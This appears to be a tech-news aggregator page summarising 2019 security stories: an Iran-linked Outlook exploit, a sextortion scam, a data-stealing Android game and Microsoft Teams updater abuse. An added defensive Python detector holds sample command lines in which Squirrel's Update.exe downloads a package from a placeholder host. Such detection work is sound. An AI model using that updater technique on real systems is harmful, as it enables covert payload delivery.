
Less than two weeks ago, U.S. Cyber Command launched an offensive on Iran to disable computer systems used by the country's Revolutionary Guard Corps to control rocket and missile launches. Now, the agency has issued an unprecedented public warning that it has discovered the "active malicious use" of a Microsoft Outlook vulnerability that appears to be linked to Iran. When the U.S. opted for an offensive cyber strike instead of a more conventional missile strike in retaliation for the downing of a U.S. drone, it was painted as a backtrack but, as I reported at the time, it was actually a game changer. If the U.S. has used offensive cyber to compromise Iran's core command and control systems, it completely changes the battlefield dynamic. It was also notable that the U.S. decided to put the cyber strike into the public domain. Iran does not play in the same league as Russia or China when it comes to cyber capabilities. The country's ability to retaliate against the U.S. government is limited. But, for Iran, there are many easier targets. And one of the fears expressed by analysts after the military cyber strike was that Iran might elect to increase its cyber activity in the broader non-governmental sector. And so to this warning, and Cyber Command tweeting that it has discovered the "use of CVE-2017-11774 and recommends immediate patching," adding a disabled link to the suspected delivery URL. The vulnerability was first discovered by Sensepost and patched in 2017—so if an Outlook install has been patched there is no concern. But we all know—and countless press articles have run this year alone—that many systems remain unpatched and vulnerable, opening up entire networks to potential bad actors. The bug essentially opens a door for malicious code to escape from Outlook into the underlying operating system. And the point at issue here is that this vulnerability has been linked to Iran before.
As reported by ZDNet, the bug was first exposed in 2017, "but by 2018, it had been weaponized by an Iranian state-sponsored hacking group known as APT33 (or Elfin), primarily known for developing the Shamoon disk-wiping malware." For more turn to OUR FORUM.

Google recently generated a flurry of coverage about its supposed privacy pivot, including an op-ed in The New York Times by chief executive Sundar Pichai. “We feel privileged that billions of people trust products like Search, Chrome, Maps, and Android to help them every day,” Pichai wrote. It’s not that we necessarily trust Google. It’s that, as a near monopoly, we have no choice. In fact, the crisis of trust — after a year of data breaches and congressional appearances — has led all the major tech companies to launch public relations campaigns around privacy. This is a smokescreen to satisfy regulators and pacify consumers while continuing their data exploitation activities. While some of the changes they have made are positive, they have no intention to give up their lucrative business model of ads powered by surveillance, which is fundamentally at odds with privacy. There was a time when we had meaningful privacy on the Internet. In the early days, dot-com barons weren’t interested in surveillance and data mining. The business model was subscriptions, led by companies like America Online, which dominated the space. As more users moved away from proprietary portals like America Online toward the open Internet, browsers and search replaced subscriber services as the gateway to the web. Clicks and user data seeded the beginnings of what is now called surveillance capitalism. By the end of the decade, a science project at Stanford was on pace to supplant “search” as a verb. Ironically, Google is an ad-funded doppelganger of the subscriber services it replaced. Instead of charging users for access, it simply spies on their online activity, location history, and behaviors to give advertisers (their true customers) unprecedented power to manipulate consumer behavior. For more navigate to OUR FORUM.

An extortion scam is being distributed that claims a Remote Access Trojan, or RAT, was installed on your computer using the EternalBlue exploit. The scammers then go on to say that they used the RAT to take videos of you on adult web sites and that you must pay a ransom or they will send it to all of your contacts. EternalBlue is an exploit allegedly created by the NSA that targets a vulnerability in the SMBv1 protocol. This vulnerability allows attackers to execute commands on a vulnerable computer that can be used to install malware. The extortion emails being distributed have a subject of "Security Alert. Your account was compromised. Password must be changed" and spins a tale that while visiting a porn site, the EternalBlue exploit was triggered to install a Remote Access Trojan on your computer. This Trojan was then allegedly used to take videos of you, steal your contacts, and your passwords. It goes on to say if you do not pay a $600 extortion demand, the attacker will send your video to all of your contacts. The reality is that this is just a scam and the senders have not utilized any exploits on your computer, there is no RAT installed, and there are no videos of you while using an adult web site. Any passwords or email addresses listed in the email are simply from data breaches where your account info was publicly disclosed. While you now know this is a scam, unfortunately not everyone else does and some people actually pay the extortion demand. Visit OUR FORUM for more.

An Android horror game with over 50,000 installs was found to exhibit malicious behavior, stealing the gamers' Google and Facebook credentials, and siphoning their data after logging into their accounts. The game is called Scary Granny ZOMBYE Mod: The Horror Game 2019 (Scary Granny) and it is designed to bank on the success of another Android game dubbed Granny that currently has over 100 million installs. While Scary Granny is a fully functional game, which would actually keep gamers playing it to avoid any suspicion and raising any red flags, it was removed on June 27 from Google's Play Store after the researchers who unearthed its phishing and data siphoning abilities reported it to Google. To hide its actual "horror" side, the game would delay exhibiting any malicious activity for up to two days after being installed, as Wandera's research team discovered. The app would also only turn on its data-stealing modules if it was being used on older Android versions, with users of newer devices running up-to-date operating systems not being impacted. When being installed, the Scary Granny game gains persistence on the device by asking for permission to launch itself after the smartphone or tablet is restarted. This allows it to show full-screen phishing overlays even after the Android users reboot their devices, by first displaying "a notification telling the user to update Google security services. When the user hits ‘update’, a fake Google login page is presented, which is very convincing other than the fact ‘sign in’ is spelled incorrectly." Learn more by visiting OUR FORUM.

The update mechanism as it is currently implemented in the Microsoft Teams desktop app allows downloading and executing arbitrary files on the system. The same issue affects GitHub, WhatsApp, and UiPath software for desktop computers, but there it can be used only to download a payload. These applications rely on the open source Squirrel project to manage installation and updating routines, which uses the NuGet package manager to create the necessary files. Multiple security researchers discovered that, by using the 'update' command of a vulnerable application, it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.' With Microsoft Teams, a payload is added to its folder and executed automatically using certain commands. These commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location. The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts database on GitHub. Reverse engineer Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point, as Microsoft informed the researcher that the fix would come in a future release of the software. Trying to replicate the effect with GitHub, WhatsApp, and UiPath did not achieve execution of the payload; only downloading it from a remote server was possible. "In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer. If you use Microsoft Teams, you surely want to learn more about this security issue and visit OUR FORUM.
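As an added, defender-side illustration (not code from the page, from Microsoft, or from the Squirrel project): a small Python filter that flags process-creation records in which a Squirrel binary (Update.exe or squirrel.exe) is launched with an update or download argument pointing at a remote URL, so such launches can be reviewed against the vendor's expected update source. The log records, file paths, hostnames and the exact argument syntax below are constructed assumptions for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation records (not real telemetry).
# The "--update=" / "--download=" argument forms are an assumption
# modelled on the 'update' and 'download' commands described above.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "cmdline": r'Update.exe --processStart "Teams.exe"'},
    {"image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "cmdline": r"Update.exe --update=http://example.invalid/pkg"},
    {"image": r"C:\Users\alice\AppData\Local\SquirrelTemp\squirrel.exe",
     "cmdline": r"squirrel.exe --download=https://example.invalid/pkg.nupkg"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe --update=http://example.invalid/ignored"},
]

# Squirrel executables named on the page (compared case-insensitively).
SQUIRREL_BINARIES = {"update.exe", "squirrel.exe"}

# An update/download verb followed by '=' or whitespace and an HTTP(S) URL.
REMOTE_VERB = re.compile(
    r"(?i)(?:^|[\s\-])(update|download)(?:=|\s+)(?P<url>https?://\S+)")


def flag_squirrel_remote(events, allowed_hosts=frozenset()):
    """Return records where a Squirrel binary fetches from a remote host.

    allowed_hosts: hostnames treated as the expected update source
    (an assumption; a real deployment would fill in the vendor's host).
    """
    hits = []
    for ev in events:
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        if image_name not in SQUIRREL_BINARIES:
            continue  # only Squirrel's own binaries are of interest here
        m = REMOTE_VERB.search(ev["cmdline"])
        if not m:
            continue  # no update/download verb with a remote target
        url = m.group("url").rstrip('"')
        host = (urlparse(url).hostname or "").lower()
        if host in allowed_hosts:
            continue  # fetch from the expected update source
        hits.append({"image": ev["image"],
                     "verb": m.group(1).lower(),
                     "host": host,
                     "url": url})
    return hits


if __name__ == "__main__":
    for hit in flag_squirrel_remote(SAMPLE_EVENTS):
        print(f"{hit['verb']:<8} {hit['host']:<18} {hit['image']}")
```

Pairing this with a file-creation rule on the application's own folder catches the second half of the behaviour described above (the payload being dropped next to Update.exe before execution).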

Some Windows 10 users are seeing notifications from Microsoft that their devices are temporarily blocked from receiving the Windows 10 1903 update. There have been some bugs and issues with Microsoft's Windows 10 May Update/1903 feature update since Microsoft kicked off its rollout in late May. But the 1903 complaint I've gotten most often (so far) is from users who want to install the update but can't and don't know why. Microsoft has added a new notification which some users whose devices aren't ready or able to install the update are seeing when they attempt to proactively grab the 1903 release. As originally noted last week by Windows Latest, Microsoft has added a new message to its Windows Update page. Users attempting to install 1903 on machines with out-of-date drivers or other issues are seeing this message: "The Windows 10 May 2019 Update is on its way. We're offering this update to compatible devices, but your device isn't ready for it. Once your device is ready, you'll see the update available on this page. There's nothing you need to do at this time." I confirmed with Microsoft that this notification is part of its 1903 rollout strategy. "The notification started with the latest changes made to improve the quality/transparency of the Windows update process," according to a Microsoft spokesperson. Microsoft officials said in a blog post on May 21 that the company planned to start automatically updating devices running the April 2018 Update and earlier versions of Windows 10 to Windows 10 1903. Last week, via the Windows Update account on Twitter, Microsoft officials communicated that they were building and training machine-learning rollout processes that would enable this to happen. Details on exactly when and how Microsoft plans to do this are scarce. More information on the automatic-update plan is posted on OUR FORUM.
